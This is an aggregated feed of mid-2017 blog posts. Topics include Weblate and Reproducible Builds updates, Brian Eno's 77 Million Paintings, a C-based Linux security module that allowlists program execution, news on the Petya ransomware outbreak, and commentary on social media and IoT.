Planet Russell

,

Sam VargheseSage advice

A wise old owl sat on an oak;

The more he saw, the less he spoke;

The less he spoke, the more he heard;

Why aren’t we like this wise, old bird?

CryptogramGood Article About Google's Project Zero

Fortune magazine just published a good article about Google's Project Zero, which finds and publishes exploits in other companies' software products.

I have mixed feeling about it. The project does great work, and the Internet has benefited enormously from these efforts. But as long as it is embedded inside Google, it has to deal with accusations that it targets Google competitors.

Planet DebianArturo Borrero González: About the OutlawCountry Linux malware

netfilter_predator

Today I noticed the internet buzz about a new alleged Linux malware called OutlawCountry by the CIA, and leaked by Wikileaks.

The malware redirects traffic from the victim to a control server in order to spy or whatever. To redirect this traffic, they use simple Netfilter NAT rules injected in the kernel.

According to many sites commenting on the issue, is seems that there is something wrong with the Linux kernel Netfilter subsystem, but I read the leaked docs, and what they do is to load a custom kernel module in order to be able to load Netfilter NAT table/rules with more priority than the default ones (overriding any config the system may have).

Isn’t that clear? The attacker is loading a custom kernel module as root in your machine. They don’t use Netfilter to break into your system. The problem is not Netfilter, the problem is your whole machine being under their control.

With root control of the machine, they could simply use any mechanism, like kpatch or whatever, to replace your whole running kernel with a new one, with full access to memory, networking, file system et al.

They probably use a rootkit or the like to take over the system.

Worse Than FailureError'd: Best Null I Ever Had

"Truly the best null I've ever had. Definitely would purchase again," wrote Andrew R.

 

"Apparently, the Department of Redundancy Department got a hold of the internet," writes Ken F.

 

Berend writes, "So, if I enter 'N' does that mean I'll be instantly hit by a death ray?"

 

"Move over, fake news, Google News has this thing," wrote Jack.

 

Evan C. writes, "I honestly wouldn't put it past parents in Canada to register their yet-to-be-born children for hockey 10 years in advance."

 

"I think that a problem has, um, something, to that computer," writes Tyler Z.

 

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Planet DebianMichal Čihař: Weblate 2.15

Weblate 2.15 has been released today. It is slightly behind schedule what was mostly caused by my vacation. As with 2.14, there are quite a lot of security improvements based on reports we got from HackerOne program and various new features.

Full list of changes:

  • Show more related translations in other translations.
  • Add option to see translations of current unit to other languages.
  • Use 4 plural forms for Lithuanian by default.
  • Fixed upload for monolingual files of different format.
  • Improved error messages on failed authentication.
  • Keep page state when removing word from glossary.
  • Added direct link to edit secondary language translation.
  • Added Perl format quality check.
  • Added support for rejecting reused passwords.
  • Extended toolbar for editing RTL languages.

If you are upgrading from older version, please follow our upgrading instructions.

You can find more information about Weblate on https://weblate.org, the code is hosted on Github. If you are curious how it looks, you can try it out on demo server. You can login there with demo account using demo password or register your own user. Weblate is also being used on https://hosted.weblate.org/ as official translating service for phpMyAdmin, OsmAnd, Turris, FreedomBox, Weblate itself and many other projects.

Should you be looking for hosting of translations for your project, I'm happy to host them for you or help with setting it up on your infrastructure.

Further development of Weblate would not be possible without people providing donations, thanks to everybody who have helped so far! The roadmap for next release is just being prepared, you can influence this by expressing support for individual issues either by comments or by providing bounty for them.

Filed under: Debian English SUSE Weblate

Planet DebianDaniel Pocock: A FOSScamp by the beach

I recently wrote about the great experience many of us had visiting OSCAL in Tirana. Open Labs is doing a great job promoting free, open source software there.

They are now involved in organizing another event at the end of the summer, FOSScamp in Syros, Greece.

Looking beyond the promise of sun and beach, FOSScamp is also just a few weeks ahead of the Outreachy selection deadline so anybody who wants to meet potential candidates in person may find this event helpful.

If anybody wants to discuss the possibilities for involvement in the event then the best place to do that may be on the Open Labs forum topic.

What will tomorrow's leaders look like?

While watching a talk by Joni Baboci, head of Tirana's planning department, I was pleasantly surprised to see this photo of Open Labs board members attending the town hall for the signing of an open data agreement:

It's great to see people finding ways to share the principles of technological freedoms far and wide and it will be interesting to see how this relationship with their town hall grows in the future.

LongNow10 Years Ago: Brian Eno’s 77 Million Paintings in San Francisco, 02007


Long Now co-founders Stewart Brand (center)
and Brian Eno (right) in San Francisco, 02007

Exactly a decade ago today, in June 02007, Long Now hosted the North American Premiere of Brian Eno’s 77 Million Paintings. It was a celebration of Eno’s unique generative art work, as well as the inaugural event of our newly launched Long Now Membership program.

Here’s how we described the large scale art work at the time:

Conceived by Brian Eno as “visual music”, his latest artwork 77 Million Paintings is a constantly evolving sound and imagescape which continues his exploration into light as an artist’s medium and the aesthetic possibilities of “generative software”.

We presented 77 Million Paintings over three nights at San Francisco’s Yerba Buena Center for the Arts (YBCA) on June 29 & 30 and July 1, 02007.

The Friday and Saturday shows were packed with about 900 attendees each. On Sunday we hosted a special Long Now members night. The crowd was smaller with only our newly joined charter members plus Long Now staff and Board, including the artist himself.

Long Now co-founder Brian Eno at his 77 Million Paintings opening in San Francisco, 02007; photo by Scott Beale

Brian Eno came in from London for the event. While he’d shown this work at the Venice Bienniale, the Milan Triennale, Tokyo, London and South Africa; this was its first showing in the U.S. (or anywhere in North America). The actual presentation was a unique large scale projection created collaboratively with San Francisco’s Obscura Digital creative studio.

The installation was in a large, dark room accompanied by generative ambient Eno music. The audience could sit in chairs at the back of the room, sink into bean bags, or lie down on rugs or the floor closer to the screens. Like the Ambient Painting at The Interval or other examples of Eno’s generative visual art, a series of high resolution images slowly fade in and over each other and out again at a glacial pace. In brilliant colors, constantly transforming at a rate so slow it is difficult to track. Until you notice it’s completely different.

Close up of 77 Million Paintings at the opening in San Francisco, 02007; photo by Robin Rupe

Close up of 77 Million Paintings at the opening in San Francisco, 02007; photo by Robin Rupe

Long Now Executive Director Alexander Rose also spoke:

About the work: Brian Eno discusses 77 Million Paintings with Wired News (excerpt):

Eno: The pieces surprise me. I have 77 Million Paintings running in my studio a lot of the time. Occasionally I’ll look up from what I’m doing and I think, “God, I’ve never seen anything like that before!” And that’s a real thrill.
Wired News: When you look at it, do you feel like it’s something that you had a hand in creating?
Eno: Well, I know I did, but it’s a little bit like if you are dealing hands of cards and suddenly you deal four aces. You know it’s only another combination that’s no more or less likely than any of the other combinations of four cards you could deal. Nonetheless, some of the combinations are really striking. You think, “Wow — look at that one.” Sometimes some combination comes up and I know it’s some result of this system that I invented, but nonetheless I didn’t imagine such a thing could be produced by it.

The exterior of Yerba Buena Center for the Arts (YBCA) has its own beautiful illumination:

There was a simultaneous virtual version of 77 Million Paintings ongoing in Second Life:

Here’s video of the Second Life version of 77 Million Paintings. Looking at it today gives you some sense of what the 02007 installation was like in person:

We brought the prototype of the 10,000 Year Clock’s Chime Generator to YBCA (this was 7 years before it was converted into a table for the opening of The Interval):

The Chime Generator was outfitted with tubular bells at the time:

10,000 Year Clock Chime Generator prototype at 77 Million Paintings in San Francisco, 02007; photo by Scott Beale

After two days open to the public, the closing night event was a performance and a party exclusively for Long Now members. Our membership program was brand new then, and many charter members joined just in time to attend the event. So a happy anniversary to all of you who are celebrating a decade as a Long Now member!

Brian Eno, 77 Million Paintings opening in San Francisco, 02007; photo by Robin Rupe

Members flew in from around the country for the event. Long Now’s Founders were all there. This began a tradition of Long Now special events with members which have included Longplayer / Long Conversation which was also at YBCA and our two Mechanicrawl events which explored of San Francisco’s mechanical wonders.

Here are a few more photos of Long Now staff and friends who attended:

Long Now co-founder Danny Hillis, 77 Million Paintings opening in San Francisco, 02007; photo by Robin Rupe

Burning Man co-founder Larry Harvey and Long Now co-founder Stewart Brand at 77 Million Paintings opening in San Francisco; photo by Scott Beale

Kevin Kelly and Louis Rosetto, 77 Million Paintings opening in San Francisco, 02007; photo by Robin Rupe

Lori Dorn and Jeffrey & Jillian of Because We Can at the 77 Million Paintings opening in San Francisco, 02007; photo by Scott Beale

Long Now staff Mikl-em & Danielle Engelman at the 77 Million Paintings opening in San Francisco, 02007; photo by Scott Beale

Thanks to Scott Beale / Laughing Squid, Robin Rupe, and myself for the photos used above. Please mouse over each to see the photo credit.

Brian Eno at 77 Million Paintings opening in San Francisco, 02007; photo by Robin Rupe

More photos from Scott Beale. More photos of the event by Mikl Em.

More on the production from Obscura Digital.

,

Cory DoctorowI’ll see you this weekend at Denver Comic-Con!




I just checked in for my o-dark-hundred flight to Denver tomorrow morning for this weekend’s Denver Comic-Con, where I’m appearing for several hours on Friday, Saturday and Sunday, including panels with some of my favorite writers, like John Scalzi, Richard Kadrey, Catherynne Valente and Scott Sigler:


Friday:


* 1:30-2:30pm The Future is Here :: Room 402
How have recent near-future works fared in preparing us for the realities of the current day? What can near-future works being published now tell us about what’s coming?
Mario Acevedo, Cory Doctorow, Sherry Ficklin, Richard Kadrey, Dan Wells

* 2:30-4:30pm Signing :: Tattered Cover Signing Booth


* 4:30-5:30pm Fight The Power! Fiction For Political Change :: Room 402
Some authors incorporate political themes and beliefs into their stories. In this tumultuous political climate, even discussions of a political nature in fiction can resonate with readers, and could even be a source of change. Our panelists will talk about what they have done in their books to cause change, and the (desired) results.
Charlie Jane Anders, Cory Doctorow, John Scalzi, Emily Singer, Ausma Zehanat Khan

Saturday:

* 12:00-1:00pm The Writing Process of Best Sellers :: Room 407
The authors of the today’s best sellers discuss their technical process and offer creative insight.
Eneasz Brodski, Cory Doctorow, John Scalzi, Catherynne Valente


* 1:30-2:30pm Creating the Anti-Hero :: Room 402
Millennial both read and write YA, and they’re sculpting the genre to meet this generation’s needs. Authors of recent YA titles discuss writing for the modern YA audience and how their books contribute to the genre.
Pierce Brown, Delilah Dawson, Cory Doctorow, Melissa Koons, Catherynne Valente, Dan Wells

* 3:30-4:30pm Millennials Rising – YA Literature Today :: Room 402
Millennial both read and write YA, and they’re sculpting the genre to meet this generation’s needs. Authors of recent YA titles discuss writing for the modern YA audience and how their books contribute to the genre.
Pierce Brown, Delilah Dawson, Cory Doctorow, Melissa Koons, Catherynne Valente, Dan Wells

* 4:30-6:30pm Signing :: Tattered Cover Signing Booth

Sunday:

11:00am-12:00pm Economics, Value and Motivating your Character :: Room 407
How does money and economics figure into writing compelling characters. The search for money In our daily lives fashions our character, and in fiction can be the cause of turning good people into bad, making characters do things that are, well, out-of-character. Money is the great motivator – and find out how these authors use it to shape their characters and move along the story.
Dr. Jason Arentz, Cory Doctorow, Van Aaron Hughes, Matt Parrish, John Scalzi

12:30-2:30pm Signing :: Tattered Cover Signing Booth

3:00-4:00pm Urban Science Fiction :: DCCP4 – Keystone City Room
The sensibility and feel of Urban Fantasy, without the hocus-pocus. They tend to be stories that could be tomorrow, with the direct consequences of today’s technologies, today’s societies. Urban Science Fiction authors discuss writing the world we don’t yet live in, but could!
Cory Doctorow, Sue Duff, Richard Kadrey, Cynthia Richards, Scott Sigler

(Image: Pat Loika, CC-BY)

CryptogramThe Women of Bletchley Park

Really good article about the women who worked at Bletchley Park during World War II, breaking German Enigma-encrypted messages.

CryptogramWebsites Grabbing User-Form Data Before It's Submitted

Websites are sending information prematurely:

...we discovered NaviStone's code on sites run by Acurian, Quicken Loans, a continuing education center, a clothing store for plus-sized women, and a host of other retailers. Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.

This is important because it goes against what people expect:

In yesterday's report on Acurian Health, University of Washington law professor Ryan Calo told Gizmodo that giving users a "send" or "submit" button, but then sending the entered information regardless of whether the button is pressed or not, clearly violates a user's expectation of what will happen. Calo said it could violate a federal law against unfair and deceptive practices, as well as laws against deceptive trade practices in California and Massachusetts. A complaint on those grounds, Calo said, "would not be laughed out of court."

This kind of thing is going to happen more and more, in all sorts of areas of our lives. The Internet of Things is the Internet of sensors, and the Internet of surveillance. We've long passed the point where ordinary people have any technical understanding of the different ways networked computers violate their privacy. Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.

Worse Than FailureThe Agreement

In addition to our “bread and butter” of bad code, bad bosses, worse co-workers and awful decision-making, we always love the chance to turn out occassional special events. This time around, our sponsors at Hired gave us the opportunity to build and film a sketch.

I’m super-excited for this one. It’s a bit more ambitious than some of our previous projects, and pulled together some of the best talent in the Pittsburgh comedy community to make it happen. Everyone who worked on it- on set or off- did an excellent job, and I couldn't be happier with the results.

Once again, special thanks to Hired, who not only helped us produce this sketch, but also helps keep us keep the site running. With Hired, instead of applying for jobs, your prospective employer will apply to interview you. You get placed in control of your job search, and Hired provides a “talent advocate” who can provide unbiased career advice and make sure you put your best foot forward. Sign up now, and find the best opportunities for your future with Hired.

And now, our feature presentation: The Agreement

Brought to you by:

[Advertisement] BuildMaster integrates with an ever-growing list of tools to automate and facilitate everything from continuous integration to database change scripts to production deployments. Interested? Learn more about BuildMaster!

,

Planet DebianSteve Kemp: Yet more linux security module craziness ..

I've recently been looking at linux security modules. My first two experiments helped me learn:

My First module - whitelist_lsm.c

This looked for the presence of an xattr, and if present allowed execution of binaries.

I learned about the Kernel build-system, and how to write a simple LSM.

My second module - hashcheck_lsm.c

This looked for the presence of a "known-good" SHA1 hash xattr, and if it matched the actual hash of the file on-disk allowed execution.

I learned how to hash the contents of a file, from kernel-space.

Both allowed me to learn things, but both were a little pointless. They were not fine-grained enough to allow different things to be done by different users. (i.e. If you allowed "alice" to run "wget" you'd also allow www-data to do the same.)

So, assuming you wanted to do your security job more neatly what would you want? You'd want to allow/deny execution of commands based upon:

  • The user who was invoking them.
  • The path of the binary itself.

So your local users could run "bad" commands, but "www-data" (post-compromise) couldn't.

Obviously you don't want to have to recompile your kernel to change the rules of who can execute what. So you think to yourself "I'll write those rules down in a file". But of course reading a file from kernel-space is tricky. And parsing any list of rules, in a file, from kernel-space would prone to buffer-related problems.

So I had a crazy idea:

  • When a user attempts to execute a program.
  • Call back to user-space to see if that should be permitted.
    • Give the user-space binary the UID of the invoker, and the path to the command they're trying to execute.

Calling userspace? Every time a command is to be executed? Crazy. But it just might work.

One problem I had with this approach is that userspace might not even be available, when you're booting. So I setup a flag to enable this stuff:

# echo 1 >/proc/sys/kernel/can-exec/enabled

Now the kernel will invoke the following on every command:

/sbin/can-exec $UID $PATH

Because the kernel waits for this command to complete - as it reads the exit-code - you cannot execute any child-processes from it as you'd end up in recursive hell, but you can certainly read files, write to syslog, etc. My initial implementionation was as basic as this:

int main( int argc, char *argv[] )
{
...

  // Get the UID + Program
  int uid = atoi( argv[1] );
  char *prg = argv[2];

  // syslog
  openlog ("can-exec", LOG_CONS | LOG_PID | LOG_NDELAY, LOG_LOCAL1);
  syslog (LOG_NOTICE, "UID:%d CMD:%s", uid, prg );

  // root can do all.
  if ( uid == 0 )
    return 0;

  // nobody
  if ( uid == 65534 ) {
    if ( ( strcmp( prg , "/bin/sh" ) == 0 ) ||
         ( strcmp( prg , "/usr/bin/id" ) == 0 ) ) {
      fprintf(stderr, "Allowing 'nobody' access to shell/id\n" );
      return 0;
    }
  }

  fprintf(stderr, "Denied\n" );
  return -1;
}

Although the UIDs are hard-code it actually worked! Yay!

I updated the code to convert the UID to a username, then check executables via the file /etc/can-exec/$USERNAME.conf, and this also worked.

I don't expect anybody to actually use this code, but I do think I've reached a point where I can pretend I've written a useful (or non-pointless) LSM at last. That means I can stop.

Google AdsenseAdSense now understands Urdu

Today, we’re excited to announce the addition of Urdu, a language spoken by millions in Pakistan, India and many other countries around the world, to the family of AdSense supported languages.

The interest for Urdu language content has been growing steadily over the last few years. AdSense provides an easy way for publishers to monetize the content they create in Urdu, and help advertisers looking to connect with the growing online Urdu audience to reach them with relevant ads.

To start monetizing your Urdu content website with Google AdSense:

  1. Check the AdSense program policies and make sure your website is compliant. 
  2. Sign up for an AdSense account 
  3. Add the AdSense code to start displaying relevant ads to your users. 
Welcome to AdSense!



Posted by: AdSense Internationalization Team

CryptogramGirl Scouts to Offer Merit Badges in Cybersecurity

The Girl Scouts are going to be offering 18 merit badges in cybersecurity, to scouts as young as five years old.

CryptogramCIA Exploits Against Wireless Routers

WikiLeaks has published CherryBlossom, the CIA's program to hack into wireless routers. The program is about a decade old.

Four good news articles. Five. And a list of vulnerable routers.

Worse Than FailureNews Roundup: The Internet of Nope

Folks, we’ve got to talk about some of the headlines about the Internet of “Things”. If you’ve been paying even no attention to that space, you know that pretty much everything getting released is some combination of several WTFs, whether in conception, implementation, and let’s not forget security.

A diagram of IoT approaches

I get it. It’s a gold-rush business. We’ve got computers that are so small, so cheap, and so power-efficient, that we can slap the equivalent of a 1980s super-computer in a toilet seat. There's the potential to create products that make our lives better, that make the world better, and could carry us into a glowing future. It just sometimes feels like that's not what anybody's actually trying to make, though. Without even checking, I’m sure you can buy a WiFi enabled fidget spinner that posts the data to a smartphone app where you can send “fidges” to your friends, bragging about your RPMs.

We need this news-roundup, because when Alexa locks you out of your house because you didn’t pay for Amazon Prime this month, we can at least say “I told you so”. You think I’m joking, but Burger King wants in on that action, with its commercial that tries to trick your Google Assistant into searching for burgers. That’s also not the first time that a commercial has trigged voice commands, and I can guarantee that it isn’t going to be the last.

Now, maybe this is sour grapes. I bought a Nest thermostat before it was cool, and now three hardware generations on, I’m not getting software updates, and there are rumors about the backend being turned off someday. Maybe Nest needs a model more like “Hive Hub”. Hive is a startup with £500M invested, making it one of the only “smart home” companies with an actual business model. Of course, that business model is that you’ll pay $39.99 per month to turn your lights on and off.

At least you know that some of that money goes to keeping your smart-home secure. I’m kidding, of course- nobody spends any effort on making these devices secure. There are many, many high profile examples of IoT hacks. You hook your toaster up to the WiFi and suddenly it’s part of a botnet swarm mining BitCoins. One recent, high-profile example is the ZigBee Protocol, which powers many smart-home systems. It’s a complete security disaster, and opens up a new line of assault- instead of tricking a target to plug a thumb drive into their network, you can now put your payload in a light bulb.

Smart-homes aside, IoT in general is breeding ground for botnets. Sure, your uncle Jack will blindly click through every popup and put his computer password in anything that looks like a password box, but at least you can have some confidence that his Windows/Mac/Linux desktop has some rudimentary protections bundled with the OS. IoT vendors apparently don’t care.

Let’s take a break, and take a peek at a fun story about resetting a computerized lock. Sure, they could have just replaced the lock, but look at all the creative hackery they had to do to get around it.

With that out of the way, let’s talk about tea. Ever since the Keurig coffee maker went big, everyone’s been trying to be “the Keurig for waffles” or “the Keurig for bacon” or “the Keurig for juice”- the latter giving us the disaster that is the Juicero. Mash this up with the Internet of Things, and you get this WiFi enabled tea-maker, which can download recipes for brewing tea off the Internet. And don’t worry, it’ll always use the correct recipe because each pod is loaded with an RFID that not only identifies which recipe to use, but ensures that you’re not using any unathorized tea.

In addition to the “Keurig, but for $X,” there’s also the ever popular “the FitBit, but for $X.” Here’s the FitBit for desks. It allows your desk to nag you about getting up, moving around, and it’ll upload your activity to the Internet while it’s at it. I’m sure we’re all really excited for when our “activity” gets logged for future review.

Speaking of FitBits, Qualcomm just filed some patents for putting that in your workout shoes. This is actually not a totally terrible idea- I mean, by standards of that tea pot, anyway. I share it here because they’re calling it “The Internet of Shoes” which is a funny way of saying, “our marketing team just gave up”.

Finally, since we’re talking about Internet connected gadgets that serve no real purpose, Google Glass got its first software update in three years. Apparently Google hasn’t sent the Glass to a farm upstate, where it can live with Google Reader, Google Wave, Google Hangouts, and all the other projects Google got bored of.

[Advertisement] Application Release Automation – build complex release pipelines all managed from one central dashboard, accessibility for the whole team. Download and learn more today!

,

Krebs on Security‘Petya’ Ransomware Outbreak Goes Global

A new strain of ransomware dubbed “Petya” is worming its way around the world with alarming speed. The malware is spreading using a vulnerability in Microsoft Windows that the software giant patched in March 2017 — the same bug that was exploited by the recent and prolific WannaCry ransomware strain.

The ransom note that gets displayed on screens of Microsoft Windows computers infected with Petya.

The ransom note that gets displayed on screens of Microsoft Windows computers infected with Petya.

According to multiple news reports, Ukraine appears to be among the hardest hit by Petya. The country’s government, some domestic banks and largest power companies all warned today that they were dealing with fallout from Petya infections.

Danish transport and energy firm Maersk said in a statement on its Web site that “We can confirm that Maersk IT systems are down across multiple sites and business units due to a cyber attack.” In addition, Russian energy giant Rosneft said on Twitter that it was facing a “powerful hacker attack.” However, neither company referenced ransomware or Petya.

Security firm Symantec confirmed that Petya uses the “Eternal Blue” exploit, a digital weapon that was believed to have been developed by the U.S. National Security Agency and in April 2017 leaked online by a hacker group calling itself the Shadow Brokers.

Microsoft released a patch for the Eternal Blue exploit in March (MS17-010), but many businesses put off installing the fix. Many of those that procrastinated were hit with the WannaCry ransomware attacks in May. U.S. intelligence agencies assess with medium confidence that WannaCry was the work of North Korean hackers.

Organizations and individuals who have not yet applied the Windows update for the Eternal Blue exploit should patch now. However, there are indications that Petya may have other tricks up its sleeve to spread inside of large networks.

Russian security firm Group-IB reports that Petya bundles a tool called “LSADump,” which can gather passwords and credential data from Windows computers and domain controllers on the network.

Petya seems to be primarily impacting organizations in Europe, however the malware is starting to show up in the United States. Legal Week reports that global law firm DLA Piper has experienced issues with its systems in the U.S. as a result of the outbreak.

Through its twitter account, the Ukrainian Cyber Police said the attack appears to have been seeded through a software update mechanism built into M.E.Doc, an accounting program that companies working with the Ukranian government need to use.

Nicholas Weaver, a security researcher at the International Computer Science Institute and a lecturer at UC Berkeley, said Petya appears to have been well engineered to be destructive while masquerading as a ransomware strain.

Weaver noted that Petya’s ransom note includes the same Bitcoin address for every victim, whereas most ransomware strains create a custom Bitcoin payment address for each victim.

Also, he said, Petya urges victims to communicate with the extortionists via an email address, while the majority of ransomware strains require victims who wish to pay or communicate with the attackers to use Tor, a global anonymity network that can be used to host Web sites which can be very difficult to take down.

“I’m willing to say with at least moderate confidence that this was a deliberate, malicious, destructive attack or perhaps a test disguised as ransomware,” Weaver said. “The best way to put it is that Petya’s payment infrastructure is a fecal theater.”

Ransomware encrypts important documents and files on infected computers and then demands a ransom (usually in Bitcoin) for a digital key needed to unlock the files. With most ransomware strains, victims who do not have recent backups of their files are faced with a decision to either pay the ransom or kiss their files goodbye.

Ransomware attacks like Petya have become such a common pestilence that many companies are now reportedly stockpiling Bitcoin in case they need to quickly unlock files that are being held hostage by ransomware.

Security experts warn that Petya and other ransomware strains will continue to proliferate as long as companies delay patching and fail to develop a robust response plan for dealing with ransomware infestations.

According to ISACA, a nonprofit that advocates for professionals involved in information security, assurance, risk management and governance, 62 percent of organizations surveyed recently reported experiencing ransomware in 2016, but only 53 percent said they had a formal process in place to address it.

Update: 5:06 p.m. ET: Added quotes from Nicholas Weaver and links to an analysis by the Ukrainian cyber police.

Planet DebianDaniel Pocock: How did the world ever work without Facebook?

Almost every day, somebody tells me there is no way they can survive without some social media like Facebook or Twitter. Otherwise mature adults fearful that without these dubious services, they would have no human contact ever again, they would die of hunger and the sky would come crashing down too.

It is particularly disturbing for me to hear this attitude from community activists and campaigners. These are people who aspire to change the world, but can you really change the system using the tools the system gives you?

Revolutionaries like Gandhi and the Bolsheviks don't have a lot in common: but both of them changed the world and both of them did so by going against the system. Gandhi, of course, relied on non-violence while the Bolsheviks continued to rely on violence long after taking power. Neither of them needed social media but both are likely to be remembered far longer than any viral video clip you have seen recently.

With US border guards asking visitors for their Facebook profiles and Mark Zuckerberg being a regular participant at secretive Bilderberg meetings, it should be clear that Facebook and conventional social media is not on your side, it's on theirs.

Kettling has never been easier

When street protests erupt in major cities such as London, the police build fences around the protesters, cutting them off from the rest of the world. They become an island in the middle of the city, like a construction site or broken down bus that everybody else goes around. The police then set about arresting one person at a time, taking their name and photograph and then slowly letting them leave in different directions. This strategy is called kettling.

Facebook helps kettle activists in their arm chair. The police state can gather far more data about them, while their impact is even more muted than if they ventured out of their home.

You are more likely to win the lottery than make a viral campaign

Every week there is news about some social media campaign that has gone viral. Every day, marketing professionals, professional campaigners and motivated activists sit at their computer spending hours trying to replicate this phenomenon.

Do the math: how many of these campaigns can really be viral success stories? Society can only absorb a small number of these campaigns at any one time. For most of the people trying to ignite such campaigns, their time and energy is wasted, much like money spent buying lottery tickets and with odds that are just as bad.

It is far better to focus on the quality of your work in other ways than to waste any time on social media. If you do something that is truly extraordinary, then other people will pick it up and share it for you and that is how a viral campaign really begins. The time and effort you put into trying to force something to become viral is wasting the energy and concentration you need to make something that is worthy of really being viral.

An earthquake and an escaped lion never needed to announce themselves on social media to become an instant hit. If your news isn't extraordinary enough for random people to spontaneously post, share and tweet it in the first place, how can it ever go far?

The news media deliberately over-rates social media

News media outlets, including TV, radio and print, gain a significant benefit crowd-sourcing live information, free of charge, from the public on social media. It is only logical that they will cheer on social media sites and give them regular attention. Have you noticed that whenever Facebook's publicity department makes an announcement, the media are quick to publish it ahead of more significant stories about social or economic issues that impact our lives? Why do you think the media puts Facebook up on a podium like this, ahead of all other industries, if the media aren't getting something out of it too?

The tail doesn't wag the dog

One particular example is the news media's fascination with Donald Trump's Twitter account. Some people have gone as far as suggesting that this billionaire could have simply parked his jet and spent the whole of 2016 at one of his golf courses sending tweets and he would have won the presidency anyway. Suggesting that Trump's campaign revolved entirely around Twitter is like suggesting the tail wags the dog.

The reality is different: Trump has been a prominent public figure for decades, both in the business and entertainment world. During his presidential campaign, he had at least 220 major campaign rallies attended by over 1.2 million people in the real world. Without this real-world organization and history, the Twitter account would have been largely ignored like the majority of Twitter accounts.

On the left of politics, the media have been just as quick to suggest that Bernie Sanders and Jeremy Corbyn have been supported by the "Facebook generation". This label is superficial and deceiving. The reality, again, is a grass roots movement that has attracted young people to attend local campaign meetings in pubs up and down the country. Getting people to get out and be active is key. Social media is incidental to their campaign, not indispensible.

Real-world meetings, big or small, are immensely more powerful than a social media presence. Consider the Trump example again: if 100,000 people receive one of his tweets, how many even notice it in the non-stop stream of information we are bombarded with today? On the other hand, if 100,000 bellow out a racist slogan at one of his rallies, is there any doubt whether each and every one of those people is engaged with the campaign at that moment? If you could choose between 100 extra Twitter followers or 10 extra activists attending a meeting every month, which would you prefer?

Do we need this new definition of a Friend?

Facebook is redefining what it means to be a friend.

Is somebody who takes pictures of you and insists on sharing them with hundreds of people, tagging your face for the benefit of biometric profiling systems, really a friend?

If you want to find out what a real friend is and who your real friends really are, there is no better way to do so then blowing away your Facebook and Twitter account and waiting to see who contacts you personally about meeting up in the real world.

If you look at a profile on Facebook or Twitter, one of the most prominent features is the number of friends or followers they have. Research suggests that humans can realistically cope with no more than about 150 stable relationships. Facebook, however, has turned Friending people into something like a computer game.

This research is also given far more attention then it deserves though: the number of really meaningful friendships that one person can maintain is far smaller. Think about how many birthdays and spouse's names you can remember and those may be the number of real friendships you can manage well. In his book Busy, Tony Crabbe suggests between 10-20 friendships are in this category and you should spend all your time with these people rather than letting your time be spread thinly across superficial Facebook "friends".

This same logic can be extrapolated to activism and marketing in its many forms: is it better for a campaigner or publicist to have fifty journalists following him on Twitter (where tweets are often lost in the blink of an eye) or three journalists who he meets for drinks from time to time?

Facebook alternatives: the ultimate trap?

Numerous free, open source projects have tried to offer an equivalent to Facebook and Twitter. GNU social, Diaspora and identi.ca are some of the more well known examples.

Trying to persuade people to move from Facebook to one of these platforms rarely works. In most cases, Metcalfe's law suggests the size of Facebook will suck them back in like the gravity of a black hole.

To help people really beat these monstrosities, the most effective strategy is to help them live without social media, whether it is proprietary or not. The best way to convince them may be to give it up yourself and let them see how much you enjoy life without it.

Share your thoughts

The FSFE community has recently been debating the use of propriety software and services. Please feel free to join the list and click here to reply on the thread.

Planet DebianReproducible builds folks: Reproducible Builds: week 113 in Stretch cycle

Here's what happened in the Reproducible Builds effort between Sunday June 18 and Saturday June 24 2017:

Upcoming and Past events

Our next IRC meeting is scheduled for the 6th of July at 17:00 UTC with this agenda currently:

  1. Introductions
  2. Reproducible Builds Summit update
  3. NMU campaign for buster
  4. Press release: Debian is doing Reproducible Builds for Buster
  5. Reproducible Builds Branding & Logo
  6. should we become an SPI member
  7. Next meeting
  8. Any other business

On June 19th, Chris Lamb presented at LinuxCon China 2017 on Reproducible Builds.

On June 23rd, Vagrant Cascadian held a Reproducible Builds question and answer session at Open Source Bridge.

Reproducible work in other projects

LEDE: firmware-utils and mtd-utils/mkfs.jffs2 now honor SOURCE_DATE_EPOCH.

Toolchain development and fixes

There was discussion on #782654 about packaging bazel for Debian.

Dan Kegel wrote a patch to use ar determinitiscally for Homebrew, a package manager for MacOS.

Dan Kegel worked on using SOURCE_DATE_EPOCH and other reproduciblity fixes in fpm, a multi plattform package builder.

The Fedora Haskell team disabled parallel builds to achieve reproducible builds.

Bernhard M. Wiedemann submitted many patches upstream:

Packages fixed and bugs filed

Patches submitted upstream:

Other patches filed in Debian:

Reviews of unreproducible packages

573 package reviews have been added, 154 have been updated and 9 have been removed in this week, adding to our knowledge about identified issues.

1 issue type has been updated:

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (98)

diffoscope development

Version 83 was uploaded to unstable by Chris Lamb. It also moved the previous changes from experimental (to where they were uploaded) to unstable. It included contributions from previous weeks.

You can read about these changes in our previous weeks' posts, or view the changelog directly (raw form).

We plan to maintain a backport of this and future versions in stretch-backports.

Ximin Luo also worked on better html-dir output for very very large diffs such as those for GCC. So far, this includes unreleased work on a PartialString data structure which will form a core part of a new and more intelligent recursive display algorithm.

strip-nondeterminism development

Versions 0.035-1 was uploaded to unstable from experimental by Chris Lamb. It included contributions from:

  • Bernhard M. Wiedemann
    • Add CPIO handler and test case.
  • Chris Lamb
    • Packaging improvements.

Later in the week Mattia Rizzolo uploaded 0.035-2 with some improvements to the autopkgtest and to the general packaging.

We currently don't plan to maintain a backport in stretch-backports like we did for jessie-backports. Please speak up if you think otherwise.

reproducible-website development

  • Chris Lamb:
    • Add OpenEmbedded to projects page after a discussion at LinuxCon China.
    • Update some metadata for existing talks.
    • Add 13 missing talks.

tests.reproducible-builds.org

  • Alexander 'lynxis' Couzens
    • LEDE: do a quick sha256sum before calling diffoscope. The LEDE build consists of 1000 packages, using diffoscope to detect whether two packages are identical takes 3 seconds in average, while calling sha256sum on those small packages takes less than a second, so this reduces the runtime from 3h to 2h (roughly). For Debian package builds this is neglectable, as each build takes several minutes anyway, thus adding 3 seconds to each build doesn't matter much.
    • LEDE/OpenWrt: move toolchain.html creation to remote node, as this is were the toolchain is build.
    • LEDE: remove debugging output for images.
    • LEDE: fixup HTML creation for toolchain, build path, downloaded software and GIT commit used.
